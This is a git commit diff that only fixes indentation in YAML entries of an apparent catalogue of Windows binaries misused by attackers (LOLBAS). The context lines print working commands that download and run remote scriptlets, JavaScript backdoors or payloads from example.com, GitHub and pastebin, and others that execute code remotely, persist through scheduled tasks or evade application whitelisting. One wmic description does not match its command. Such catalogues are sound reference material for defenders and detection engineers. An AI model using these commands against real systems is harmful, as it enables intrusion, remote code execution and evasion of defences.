Correct identation

This commit is contained in:
Hegusung 2024-10-13 17:57:36 +02:00
parent 6375a4a338
commit 75d04eaf72
28 changed files with 54 additions and 54 deletions

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: XBAP - Execute: XBAP
- Command: Presentationhost.exe https://example.com/payload - Command: Presentationhost.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache. Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags: Tags:
- Execute: CMD - Execute: CMD
Full_Path: Full_Path:
- Path: c:\windows\system32\provlaunch.exe - Path: c:\windows\system32\provlaunch.exe
Detection: Detection:

View File

@ -12,8 +12,8 @@ Commands:
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: SCT - Execute: SCT
- Execute: Remote - Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll. Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting Usecase: Execute code from scriptlet, bypass Application whitelisting
@ -22,7 +22,7 @@ Commands:
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: SCT - Execute: SCT
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll. Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting Usecase: Execute code from remote scriptlet, bypass Application whitelisting
@ -31,8 +31,8 @@ Commands:
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: SCT - Execute: SCT
- Execute: Remote - Execute: Remote
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll. Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting Usecase: Execute code from scriptlet, bypass Application whitelisting
@ -41,7 +41,7 @@ Commands:
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: SCT - Execute: SCT
Full_Path: Full_Path:
- Path: C:\Windows\System32\regsvr32.exe - Path: C:\Windows\System32\regsvr32.exe
- Path: C:\Windows\SysWOW64\regsvr32.exe - Path: C:\Windows\SysWOW64\regsvr32.exe

View File

@ -30,7 +30,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: JScript - Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
Usecase: Proxy execution Usecase: Proxy execution
@ -39,7 +39,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: JScript - Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
Usecase: Proxy execution Usecase: Proxy execution
@ -48,7 +48,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: JScript - Execute: JScript
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
Usecase: Execute code from Internet Usecase: Execute code from Internet
@ -57,7 +57,7 @@ Commands:
MitreID: T1218.011 MitreID: T1218.011
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: JScript - Execute: JScript
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
Usecase: Execute code from alternate data stream Usecase: Execute code from alternate data stream

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags: Tags:
- Execute: EXE - Execute: EXE
Full_Path: Full_Path:
- Path: c:\windows\system32\runexehelper.exe - Path: c:\windows\system32\runexehelper.exe
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: CMD - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\System32\runonce.exe - Path: C:\Windows\System32\runonce.exe
- Path: C:\Windows\SysWOW64\runonce.exe - Path: C:\Windows\SysWOW64\runonce.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: Powershell - Execute: Powershell
Full_Path: Full_Path:
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing> - Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
Description: Modifies an existing service and executes the file stored in the ADS. Description: Modifies an existing service and executes the file stored in the ADS.
Usecase: Execute binary file hidden inside an alternate data stream Usecase: Execute binary file hidden inside an alternate data stream
@ -21,7 +21,7 @@ Commands:
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\sc.exe - Path: C:\Windows\System32\sc.exe
- Path: C:\Windows\SysWOW64\sc.exe - Path: C:\Windows\SysWOW64\sc.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1053.005 MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
Description: Create a scheduled task on a remote computer for persistence/lateral movement Description: Create a scheduled task on a remote computer for persistence/lateral movement
Usecase: Create a remote task to run daily relative to the the time of creation Usecase: Create a remote task to run daily relative to the the time of creation
@ -21,7 +21,7 @@ Commands:
MitreID: T1053.005 MitreID: T1053.005
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
Full_Path: Full_Path:
- Path: c:\windows\system32\schtasks.exe - Path: c:\windows\system32\schtasks.exe
- Path: c:\windows\syswow64\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmd from remote server Description: Executes calc.cmd from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measures Usecase: Execute binary through proxy binary from external server to evade defensive counter measures
@ -21,8 +21,8 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: Remote - Execute: Remote
- Execute: CMD - Execute: CMD
Full_Path: Full_Path:
- Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\System32\scriptrunner.exe
- Path: C:\Windows\SysWOW64\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022 OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
Tags: Tags:
- Execute: EXE - Execute: EXE
Full_Path: Full_Path:
- Path: c:\windows\system32\setres.exe - Path: c:\windows\system32\setres.exe
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything
Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32.
Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file. Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file.
@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 8, Windows 8.1, Windows 10
Tags: Tags:
- Execute: EXE - Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\SettingSyncHost.exe - Path: C:\Windows\System32\SettingSyncHost.exe
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe - Path: C:\Windows\SysWOW64\SettingSyncHost.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 1809, Windows Server 2019 OperatingSystem: Windows 10 1809, Windows Server 2019
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: ssh -o ProxyCommand=calc.exe . - Command: ssh -o ProxyCommand=calc.exe .
Description: Executes calc.exe from ssh.exe Description: Executes calc.exe from ssh.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
@ -21,7 +21,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags: Tags:
- Execute: EXE - Execute: EXE
Full_Path: Full_Path:
- Path: c:\windows\system32\OpenSSH\ssh.exe - Path: c:\windows\system32\OpenSSH\ssh.exe
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: stordiag.exe - Command: stordiag.exe
Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it. Description: Once executed, Stordiag.exe will execute schtasks.exe and powershell.exe - if stordiag.exe is copied to a folder and an arbitrary executable is renamed to one of these names, stordiag.exe will execute it.
Usecase: Possible defence evasion purposes. Usecase: Possible defence evasion purposes.
@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 11 OperatingSystem: Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
Full_Path: Full_Path:
- Path: c:\windows\system32\stordiag.exe - Path: c:\windows\system32\stordiag.exe
- Path: c:\windows\syswow64\stordiag.exe - Path: c:\windows\syswow64\stordiag.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607 OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
Tags: Tags:
- Execute: Powershell - Execute: Powershell
Full_Path: Full_Path:
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\System32\SyncAppvPublishingServer.exe
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10 2004 and above, Windows 11 OperatingSystem: Windows 10 2004 and above, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe"
Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated.
Usecase: Spawn process using other binary Usecase: Spawn process using other binary
@ -21,7 +21,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10 1909 and below OperatingSystem: Windows 10 1909 and below
Tags: Tags:
- Execute: EXE - Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\System32\ttdinject.exe
- Path: C:\Windows\Syswow64\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1127 MitreID: T1127
OperatingSystem: Windows 10 1809 and newer, Windows 11 OperatingSystem: Windows 10 1809 and newer, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: TTTracer.exe -dumpFull -attach pid - Command: TTTracer.exe -dumpFull -attach pid
Description: Dumps process using tttracer.exe. Requires administrator privileges Description: Dumps process using tttracer.exe. Requires administrator privileges
Usecase: Dump process by PID Usecase: Dump process by PID

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Tags: Tags:
- Execute: EXE - Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\unregmp2.exe - Path: C:\Windows\System32\unregmp2.exe
- Path: C:\Windows\SysWOW64\unregmp2.exe - Path: C:\Windows\SysWOW64\unregmp2.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.012 MitreID: T1218.012
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL
Full_Path: Full_Path:
- Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\System32\verclsid.exe
- Path: C:\Windows\SysWOW64\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL
Full_Path: Full_Path:
- Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files\Windows Mail\wab.exe
- Path: C:\Program Files (x86)\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe

View File

@ -12,8 +12,8 @@ Commands:
MitreID: T1105 MitreID: T1105
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: Remote - Execute: Remote
- Execute: EXE - Execute: EXE
- Command: winget.exe install --accept-package-agreements -s msstore [name or ID] - Command: winget.exe install --accept-package-agreements -s msstore [name or ID]
Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.'
Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
Full_Path: Full_Path:
- Path: c:\windows\system32\wlrmdr.exe - Path: c:\windows\system32\wlrmdr.exe
Code_Sample: Code_Sample:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1564.004 MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: wmic.exe process call create calc - Command: wmic.exe process call create calc
Description: Execute calc from wmic Description: Execute calc from wmic
Usecase: Execute binary from wmic to evade defensive counter measures Usecase: Execute binary from wmic to evade defensive counter measures
@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
Description: Execute evil.exe on the remote system. Description: Execute evil.exe on the remote system.
Usecase: Execute binary on a remote system Usecase: Execute binary on a remote system
@ -30,8 +30,8 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
- Execute: Remote - Execute: Remote
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Description: Create a volume shadow copy of NTDS.dit that can be copied. Description: Create a volume shadow copy of NTDS.dit that can be copied.
Usecase: Execute binary on remote system Usecase: Execute binary on remote system
@ -40,8 +40,8 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: XSL - Execute: XSL
- Execute: Remote - Execute: Remote
- Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet.
Usecase: Execute script from remote system Usecase: Execute script from remote system

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
Full_Path: Full_Path:
- Path: C:\Windows\System32\WorkFolders.exe - Path: C:\Windows\System32\WorkFolders.exe
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC} - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds. Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
Usecase: Run a com object created in registry to evade defensive counter measures Usecase: Run a com object created in registry to evade defensive counter measures
@ -21,7 +21,7 @@ Commands:
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: DLL - Execute: DLL
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
Usecase: Download file from Internet Usecase: Download file from Internet

View File

@ -28,7 +28,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: CMD - Execute: CMD
Detection: Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml
Acknowledgement: Acknowledgement:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe" - Command: msedgewebview2.exe --utility-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary Usecase: Proxy execution of binary
@ -21,7 +21,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe" - Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary Usecase: Proxy execution of binary
@ -30,7 +30,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
- Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe" - Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe"
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess. Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
Usecase: Proxy execution of binary Usecase: Proxy execution of binary
@ -39,7 +39,7 @@ Commands:
MitreID: T1218.015 MitreID: T1218.015
OperatingSystem: Windows 10, Windows 11 OperatingSystem: Windows 10, Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
Full_Path: Full_Path:
- Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe - Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
Detection: Detection:

View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1202 MitreID: T1202
OperatingSystem: Windows 11 OperatingSystem: Windows 11
Tags: Tags:
- Execute: EXE - Execute: EXE
Full_Path: Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
Detection: Detection: